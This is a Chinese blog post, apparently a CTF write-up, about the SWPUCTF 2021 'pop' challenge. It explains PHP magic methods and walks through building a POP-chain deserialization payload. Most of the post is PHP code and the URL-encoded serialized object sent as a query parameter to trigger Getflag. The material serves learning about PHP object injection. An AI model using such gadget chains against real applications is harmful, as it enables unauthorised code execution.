PHP魔术方法:

image

PHP提供了一系列的魔术方法,这些魔术方法为编程提供了很多便利,在 PHP 中的作用是非常重要的。PHP 中的魔术方法通常以__(两个下划线)开始,可以在要使用时灵活调用。

例题

[SWPUCTF 2021 新生赛]pop

image

看这个PHP代码,发现中间调用了很多PHP魔术方法:
__destruct()(类对象使用结束时自动调用);这个方法可以直接调用。
__toString()(把对象转换成字符串时自动调用);
开始构造
<?php
error_reporting(0);
show_source("serialize.php");
    class w44m{
    private $admin = 'w44m';
    protected $passwd = '08067';
    }
    class w22m{
    public $w00m;
    public function __destruct(){
    echo $this->w00m;
    }
    }
    class w33m{
    public $w00m;
    public $w22m='Getflag';
    public function __toString(){
    $this->w00m->{$this->w22m}();
    return 0;
    }
    }
    $a = new w22m();
    $b = new w33m();
    $c = new w44m();
    $b->w00m = $c;
    $a->w00m = $b;
    echo urlencode(serialize($a));
?>
得到

O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D

构造payload;

/?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D

image

得到flag
难点:主要是会看代码,能够利用PHP的魔术方法,用pop链将这些方法链接起来。
版权声明:本文为traverller-2333原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/traverller-2333/p/16282122.html